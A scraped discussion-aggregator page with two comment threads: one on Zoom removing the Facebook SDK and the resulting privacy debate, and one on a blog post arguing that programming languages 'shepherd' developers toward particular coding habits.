untog(2451) about 10 hours ago [-]

FWIW Google Hangouts/Meet does the same thing. It's actually a pretty useful feature... as long as you trust the company implementing it, I guess.

klyrs(4341) about 10 hours ago [-]

Yeah, my light's still on when I'm not sharing video and I hate it

shostack(4340) about 10 hours ago [-]

I feel like this is a common video chat feature. Given that the option to mute while in the chat is likely done most frequently through their UI vs the system settings, this seems to be an appropriate use of monitoring input to ensure the user is able to avoid common problems.

There seem to be some legitimate concerns about privacy worth discussing further but I'm not sure this is one of them.

holografix(3904) about 10 hours ago [-]

Your mic is never "muted". It's just not actively capturing audio. If you want to mute it for real, unplug it.

dannyw(4045) about 7 hours ago [-]

It's not fair to be attacking zoom so much over this. They took prompt action as soon as they were aware.

harry8(4324) about 6 hours ago [-]

As soon as they were aware of the thing they themselves did.

So they don't know what they're doing? Really? How does that defense go in criminal trials?

luckylion(10000) about 5 hours ago [-]

> They took prompt action as soon as they were aware.

They took prompt action because they were attacked so much over this.

dx87(10000) about 10 hours ago [-]

It's good that they removed it, but it's also dissapointing that they had no idea that it was happening until someone made a blog post about it. Do their employees not vet any of the code they use, and just slap things together off the internet and hope it's not doing anything their users don't like?

banana_giraffe(4266) about 10 hours ago [-]

Between this and the HTTP server, it feels like Zoom of old that wrote the app was more willing to make the user experience vs user privacy trade off in favor of user experience.

Now you need to log in via Facebook with a separate browser window, and thanks to the HTTP change, you need to click on a browser dialog to launch a meeting from a link. So, they've either changed their policy to err more towards the privacy side and haven't found all the cases yet, or, more likely, still have the same attitude except when the tech world starts screaming at them.

kelnos(3940) about 9 hours ago [-]

> Do their employees not vet any of the code they use, and just slap things together off the internet

That sounds like a pretty accurate description of how software is built. (No, I'm not being flippant.)

> ... and hope it's not doing anything their users don't like?

I expect most don't think too much about it, not out of malice, but because their product manager told them 'I want FB login' and to do that, they either spend an afternoon using the FB SDK, or spend a week figuring out how it works, implementing it from scratch themselves, and debugging the inevitable interop issues with whatever oauth2 (or whatever) library they've picked. It's really a no-brainer... few developers can take the week-long route and then justify that to their manager. They'll get fired.

xiphias2(10000) about 10 hours ago [-]

It's the official SDK of one of the biggest companies. I can't fault them on not catching this. What Facebook does is ugly.

floatingatoll(4062) about 10 hours ago [-]

To rephrase this into something more beneficial to others trying to learn from this:

'It's good that they removed it, and it goes to show just how important it is to inspect your application's wire traffic as part of your development and testing processes. Otherwise you'll have no idea what's happening until someone makes a blog post about it.'

chmike(2915) about 5 hours ago [-]

I guess it was not known that the facebook sdk did something as nasty as this

bvandewalle(10000) about 5 hours ago [-]

It's an imported library. Almost nobody vets those libraries ever. And that's the current state of software supply chain.

perfectstorm(4333) about 9 hours ago [-]

they can't see what happens inside FacebookSDK's code. even if they could see it, good luck convincing the PMs and directors to avoid implementing Facebook login.

aurbano(4343) about 7 hours ago [-]

What if mobile platforms (iOS, Android... ) changed the security/privacy policy so that apps had to request the "network access" permission, either whitelisting domains they want to talk to, or askingfor wildcard access?

Most apps shouldn't need wildcard access, and the mobile device could include a warning when an app does this teaching users that they should be careful with the app.

This way at least when you installed Zoom for example, it would say something like:

"Zoom is requesting network access to:

- zoom.us - analytics.tracker.example.com - facebook.com "

And then at everyone would know. It still doesn't solve the underlaying problem, but it would probably make companies more reluctant to add third party analytics and sdks.

saagarjha(10000) about 5 hours ago [-]

Most apps are extremely chatty and prompts like these may not end up being useful.

lultimouomo(3182) about 5 hours ago [-]

Nice way to bury an innocuous 'iOS Advertiser ID' in the middle of the list. What 'iOS Advertiser ID' means is, to a very good degree of approximation, your deanonimized identity.

Also, that just linking the SDK in your app deanonimzes the user to Facebook is very, very clear in its documentation. It's not like Zoom didn't notice until someone told them. They made a decision, and now they're changing it because they were called out.

andreasley(3648) about 3 hours ago [-]

The Advertising Identifier is app-specific, and if Limit Ad Tracking is enabled, it is set to all zeros. So it's not accurate to say that it's 'your deanonimized identity'.

enitihas(3534) about 4 hours ago [-]

They are changing because right now they are growing like crazy without the need to do much on user acquisition, and a bad PR is just too costly right now. But good to see them doing it.

envy2(3486) about 4 hours ago [-]

The list is in alphabetical order. It's not malicious...

pyt(10000) about 10 hours ago [-]

I contacted LG last month regarding their use of the Facebook SDK's automatic event collection in their ThinQ Android app. They responded and told me that they're disabling it in an upcoming release (incidentally, today's). If a single email is all it took to get a company with over $50 billion in revenue to disable Facebook's tracking in one of their apps, I really don't think that these companies are sharing data intentionally.

What justification does Facebook have for keeping automatic event collection turned on by default in their SDKs? Why can't they enable it only when the the user has explicitly opted in (https://developers.facebook.com/docs/app-events/gdpr-complia...)? They even say, 'you need to ensure that your SDK implementation meets these [GDPR] consent requirements.'

nh2(3145) about 10 hours ago [-]

> I don't think these companies are sharing data with Facebook intentionally.

That would imply they are incompetent and negligent.

Would one not expect large companies like LG to have internal security and privacy reviews of the software they publish, and know very well what they are doing?

> What justification

Their core business.





Historical Discussions: It's not what programming languages do, it's what they shepherd you to (March 26, 2020: 462 points)

(466) It's not what programming languages do, it's what they shepherd you to

466 points 2 days ago by ingve in 1st position

nibblestew.blogspot.com | Estimated reading time – 3 minutes | comments | anchor

How many of you have listened, read or taken part in a discussion about programming languages that goes like the following:

Person A: 'Programming language X is bad, code written in it is unreadable and horrible.'

Person B: 'No it's not. You can write good code in X, you just have to be disciplined.'

Person A: 'It does not work, if you look at existing code it is all awful.'

Person B: 'No! Wrong! Those are just people doing it badly. You can write readable code just fine.'

After this the discussion repeats from the beginning until either one gets fed up and just leaves.

I'm guessing more than 99% of you readers have seen this, often multiple times. The sad part of this is that even though this thing happens all the time, nobody learns anything and the discussion begins anew all the time. Let's see if we can do something about this. A good way to go about it is to try to come up with a name and a description for the underlying issue.

shepherding An invisible property of a progamming language and its ecosystem that drives people into solving problems in ways that are natural for the programming language itself rather than ways that are considered 'better' in some sense. These may include things like long term maintainability, readability and performance.
This is a bit abstract, so let's look at some examples.

Perl shepherds you into using regexps

Perl has several XML parsers available and they are presumably good at their jobs (I have never actually used one so I wouldn't know). Yet, in practice, many Perl scripts do XML (and HTML) manipulation with regexes, which is brittle and 'wrong' for lack of a better term. This is a clear case of shepherding. Text manipulation in Perl is easy. Importing, calling and using an XML parser is not. And really all you need to do is to change that one string to a different string. It's tempting. It works. Surely it could not fail. Let's just do it and get on with other stuff. Boom, just like that you have been shepherded.

Note that there is nothing about Perl that forces you to do this. It provides all the tools needed to do the right thing. And yet people don't, because they are being shepherded (unconsciously) into doing the thing that is easy and fast in Perl.

Make shepherds you into embedding shell pipelines in Makefiles

Compiling code with Make is tolerable, but it fails quite badly when you need to generate source code, data files and the like. The sustainable solution would be to write a standalone program in a proper scripting language that has all the code logic needed and call that from Make with your inputs and outputs. This rarely happens. Instead people think 'I know, I have an entire Unix userland available [1], I can just string together random text mangling tools in a pipeline, write it here and be done'. This is how unmaintainability is born.

Nothing about Make forces people to behave like this. Make shepherds people into doing this. It is the easy, natural outcome when faced with the given problem.

Other examples

  • C shepherds you into manipulating data via pointers rather than value objects.
  • C++ shepherds you into providing dependencies as header-only libraries.
  • Java does not shepherd you into using classes and objects, it pretty much mandates them.
  • Turing complete configuration languages shepherd you into writing complex logic with them, even though they are usually not particularly good programming environments.
[1] Which you don't have on Windows. Not to mention that every Unix has slightly different command line arguments and semantics for basic commands meaning shell pipelines are not actually portable.




All Comments: [-] | anchor

djyde(4040) 1 day ago [-]

You read the code. The computer program you.

collyw(4322) 1 day ago [-]

There is probably more truth in this than people realise at first glance.

btilly(774) 1 day ago [-]

It is the language plus the community. And not just the language.

As an example, there is nothing about Ruby that makes it more or less prone to monkey-patching than many other dynamic languages. But once a certain number of popular frameworks did that, there was no getting away from that. (Rails even has a convention around where you put your monkey patches.)

pansa2(10000) 1 day ago [-]

> there is nothing about Ruby that makes it more or less prone to monkey-patching than many other dynamic languages.

Python disallows making changes to fundamental types like `int` and `list`. It's not possible for a Python framework to support something like Rails' `2.days.ago`.

Interestingly, I don't think this was an explicit decision made when designing Python - it's just a side effect of the built-in types being written in C rather than in Python itself.

joelbluminator(4198) 1 day ago [-]

You're talking about ActiveSupport probably, and I really love it. It augments Ruby in a very beautiful way.

I really like 2.days.ago

There were zero times were I wished it wouldn't do that.

But to each his own.

chipperyman573(4050) 1 day ago [-]

For anyone (like me) who doesn't know what monkey patching is, wikipedia says it is 'dynamic modifications of a class or module at runtime, motivated by the intent to patch existing third-party code as a workaround to a bug or feature which does not act as desired'

https://en.wikipedia.org/wiki/Monkey_patch

PeterStuer(4304) 1 day ago [-]

My take was always language quality is not about expressive power, because it's fairly difficult to come up with a non Turing complete system anyways, it is about what is easy to understand and modify.

collyw(4322) 1 day ago [-]

Isn't it a balance?

VB6 code was easy to understand on one level, but its lack of expressiveness lead to a lot more code. On the other hand when I look at Ruby code there is too much syntactic sugar for a non-ruby programmers to understand it without looking some thing sup.

DeathArrow(10000) 1 day ago [-]

ZX Spectrum Basic shepherded you into using goto keyword which I've heard it's the single most evil thing to do in software development.

onion2k(2103) 1 day ago [-]

In Speccy Basic a GOTO jumped to a line number, so if you added code in that changed your numbering the GOTO broke. That was managed by using numbers that left space (10, 20, and so on), but it was still horrible in a big program. Another issue was that you couldn't go back (that's what gosub was for). They also made code hard to follow because the execution jumped around all over the place, but that was less of a problem.

These days languages that have GOTO usually jump to a label so it's not quite as bad. They're still likely to end up as spaghetti though.

And yes, I am old.

mickduprez(4337) 1 day ago [-]

Be the shepherd, use Lisp :D

Seriously though, what other languages other than Lisp (all the mainstream ones at least) give you the freedom to change the language and/or create DSL's with the same ease? And you can still do your 'bare metal' in C if you really really need to and bring it in.

mikekchar(10000) 1 day ago [-]

> what other languages [...] give you the freedom to change the language and/or create DSL's [...]

FORTH. It's a very similar language from that respect. One of the first things you learn how to do as a FORTH developer is to rewrite the interpreter/compiler words.

agentultra(4245) 1 day ago [-]

Haskell, OCaml, probably F# too.

Can also do 'bare metal' as well.

I think the advantage to Lisp is that the programmer can generate and evaluate arbitrary expression trees at run time.

I'm not sure about the others but I recall Haskell has some difficulty with this. It's possible but it's not supported and not trivial to do.

elamje(3815) 1 day ago [-]

Working on a project with a C# DSL really makes you appreciate the magic of Lisp.

gameswithgo(4226) 1 day ago [-]

almost all languages can pull in c, so that doesn't differentiate.

being able to dsl, you have to ask how often is that useful? what happens when 10 dsls are built into a code base and you hire a new person? how hard is it to make sense of everything?

brundolf(1518) 1 day ago [-]

I actually think the OP perfectly explains the core problem with Lisp: Part of the value of shepherding is getting everyone on the same page. When everyone's their own shepherd, nobody is on the same page.

JoeAltmaier(10000) 1 day ago [-]

If all you have is a hammer, everything looks like a nail.

lsh(2879) 1 day ago [-]

My favourite when working in teams is: 'use the right tool for the right job', which presupposes you know many tools and have experience working with them ... and that the shared set of tool knowledge in the team is more than just a hammer and a nail.

muglug(4235) 1 day ago [-]

This also can change over time. For example, 15 years ago PHP shepherded you to include every file you were using explicitly, making it hard to reason about a given project if you weren't the creator.

A big effort ensued to change that — class autoloading became the standard, and a large community arose around that standard.

Similarly, JavaScript shepherded you towards some bad practices that the community has now found ample remedies for.

pitterpatter(4244) 1 day ago [-]

> This also can change over time. For example, 15 years ago PHP shepherded you to include every file you were using explicitly, making it hard to reason about a given project if you weren't the creator.

Huh, that seems backwards to me? Wouldn't the explicit approach make it more obvious what scripts were relevant?

elevenoh(10000) 1 day ago [-]

'shepherding: An invisible property of a programming language and its ecosystem that drives people into solving problems in ways that are natural for the programming language itself rather than ways that are considered 'better' in some sense'

Seems like most could lend a little more weight to: 'does this lang align with how do you want to think about/represent the problems you're solving'

hinkley(4243) 1 day ago [-]

The corollary for language and API designers: whatever you make easiest is what people will do.

If there is a 'right' way to do something, make that the default or the simplest calling pattern. If there is a new 'right' way, don't route the new way directly through the old way. People will think they're cutting out the middleman by keeping the old calling convention as long as possible.

eyegor(3707) 1 day ago [-]

I agree with all the points brought up in this article except for this curveball:

> Turing complete configuration languages shepherd you into writing complex logic with them

Everything discussed in this post is a consequence of language design or best practices. I don't think shoving complex logic into yaml files would be considered either. This is more a possibility as a result of Turing completeness, I don't think the language design has anything to do with it. All the other 'shepherding' examples are clearly intentional choices by the language designers.

jdfellow(10000) 1 day ago [-]

I think that the author of the article specifically speaking of configuration DSLs that were intended to be Turing-incomplete but somehow grew full Turing-completeness and therefore became bastard languages. YAML as a config DSL is sub-par (but I'll take it over JSON any day), and truly declarative, Turing-incomplete config languages are great, as is just using a fully-featured scripting language such as a Lisp or Python, but the middle-ground with a custom config language that is also Turing-complete is usually just bad.

Not sure I have any examples of what that might be. Perhaps nginx? or apache? Lots of complex software have very complex config languages that might accidentally be Turing-complete, but only fools would actually use them like that.

taeric(2653) 1 day ago [-]

It is a funny choice of examples. I configure Emacs with script. And, while I certainly have some bitrot in my config, it is still way more manageable than any other config I have had to deal with.

fsloth(4328) 1 day ago [-]

Although not obvious from the context, the writer of the article is the author of a build system (https://mesonbuild.com/) used in a bunch of large non-trivial high profile projects (https://mesonbuild.com/Users.html) including systemd, Nautilus and so on.

While I dislike proof-by-eminence the author has history as an original, recognized contributor in this space.

chrisweekly(4088) 1 day ago [-]

Title reminds me of 'guide you to the pit of success' (ie, a slippery slope w a positive ending), which IIRC I first encountered in a post by Zeit cofounder G Rauch, writing about NextJS.

golergka(2697) 1 day ago [-]

That's exactly what I thought about. I think this is the blog post that made this phrase popular: https://blog.codinghorror.com/falling-into-the-pit-of-succes...

savolai(4344) 1 day ago [-]

The term for this in the field of human machine interaction is (perceived) affordance, popularized by Norman.

This sounds like less active guidance than nudging or shepherding. Creating affordances is still an active design choice though.

https://en.wikipedia.org/wiki/Affordance

http://johnnyholland.org/2010/04/perceived-affordances-and-d...

ricardobeat(3649) about 14 hours ago [-]

Not sure the concept applies cleanly here. Affordance is about perceiving possibilities from an interface or environment.

For the subject of programming language idioms, the main factors are restrictions or patterns the language offers, and how naturally they fit within their context, not just perception by the user.

gameswithgo(4226) 1 day ago [-]

Something i like about rust is it shepards you to fast running programs and away from null pointer errors.

something i like about go is it shepards you to write code any other go programmer can follow easily

something i dislike about c# is it has the tools to let you write very very fast code but shepards you to use non devirtualized interfaces over heap allocated classes tied together with linq overhead.

pjmlp(200) 1 day ago [-]

That is the beauty of languages like C#, productivity and security first, provide the tools to go down the performance well if actually needed.

capableweb(2015) 1 day ago [-]

> something i like about go is it shepards you to write code any other go programmer can follow easily

Sure, the syntax and indentation levels are all the same, but that's not really the difficult parts of programming. The difficulty comes from abstractions, indirections and other abstract things that Go, just as any language, let's you do however you want.

There are of course codebases made in Go where the indirections makes no sense and are hard to follow, just as in any language.

What Go shepards you into is to make really verbose code (well, compared to most languages except Java I guess), where everything is explicit, unless hidden by indirection. This is both a blessing and a curse.

elamje(3815) 1 day ago [-]

I spend a fair amount of time in C# and don't think about performance a lot unless it's obvious, O(N^2) type of stuff. I'm always trying to level up so I would appreciate some tips.

What tooling are you referring to that will make C# really fast?

Also, what are you referring to with non-devirtualized interfaces vs heap classes with LINQ?

DeathArrow(10000) 1 day ago [-]

To allocate things on stack you have to either use only value types or use unsafe code. Which is fine for small performance critical sections but will introduce bugs and hinder productivity much if used for large code bases.

LoveMortuus(10000) 1 day ago [-]

Is shepherding present in every aspect of life?

My guess would be that it is and that shepherding is what we talk about when we say that we can learn from every aspect of life.

If what I wrote is correct, than shepherding is the teacher of reality. But I guess it's on us to decide when we've learned enough and move on.

I was at first wanting to ask if shepherding is present in video games as well, but then I realized what shepherding could actually be.

SHEPHERDING; The part of an aspect that _can_ teach you something.

_can_, because it's up to you to decide if you'll learn anything.

Is shepherding always negative or can it be positive?

Also, if we would always strive to fix what shepherding teaches us, would that mean that in infinite amount of time we would reach perfection?

And, last question I swear, is shepherding subjective or objective. Or is it both?

Sammi(10000) 1 day ago [-]

https://en.wikipedia.org/wiki/Nudge_theory

'Nudge is a concept in behavioral science, political theory and behavioral economics which proposes positive reinforcement and indirect suggestions as ways to influence the behavior and decision making of groups or individuals. Nudging contrasts with other ways to achieve compliance, such as education, legislation or enforcement. '

'A nudge makes it more likely that an individual will make a particular choice, or behave in a particular way, by altering the environment so that automatic cognitive processes are triggered to favour the desired outcome.'

m12k(10000) 1 day ago [-]

Shepherding is when some behavior is encouraged by being made easy/rewarded, or by other behavior being made harder/punished. So shepherding absolutely happens in every aspect of life - systems move toward low energy states, water flows downhill and living creatures tend to follow the path of least resistance. When parents do it, we call it parenting. When governments or companies do it (via taxes/subsidies or pricing), we call it nudging. When groups do it, we call it socialization.

It's a really useful tool to analyze systems and organizations with - not by looking at what they make possible, but also by what they encourage and discourage - most of the time, the latter are what really matter (the average case is usually what determines the long-term impact of something, not the best or the worst case). When Netflix has auto-play at the end of a stream, they shepherd you toward binging. When Animal Crossing has things you need to wait wall-clock time for, they encourage you not to binge. When free-to-play games come with loot boxes, they don't force you to do anything, but they might still be shepherding gambling-like behavior.

pietroppeter(4213) 1 day ago [-]

I like the concept and I particularly like the way I feel nim shepherds me:

* I very rarely need to come up with a name for a function or other identifier. The correct name can be reused for multiple use cases thanks to the type system and prox overloading. * to spend a little time designing the interface before jumping in the code * but also to think what I really need to accomplish and get to it instead of building a grandiose architecture * to have consistent apis * to steer away from OOP * to rely on minimal dependencies and to be kind of minimal in general * to use the correct tool for the problem (macro are not easy to write and that's good otherwise you will abuse them. Instead they are great to use) * to build main table code * ...

I would be interested in what other nimmers think are the good shepherding.

One might also think of what is bad shepherding of nim, although nothing comes to mind at the moment.

beagle3(2793) about 23 hours ago [-]

> * to use the correct tool for the problem (macro are not easy to write and that's good otherwise you will abuse them. Instead they are great to use)

Just wanted to add: Nim has Macros (which are comparable to lisp forms) and Templates, which are closer to C and Lisp macros and are much harder to abuse; It also has built-in inlines and generics, which are essentially the prime use for templates and macros in languages that lack those.

It also has stuff like operational transforms, which lets you state things like 'whenever you see x*4 and x is an integer, use x shl 2 itself', so that you CAN apply your knowledge in the places where you know better than the compiler, while still writing the code you meant to write (multiply by 4) and not the assembly you wanted to generate.

Right t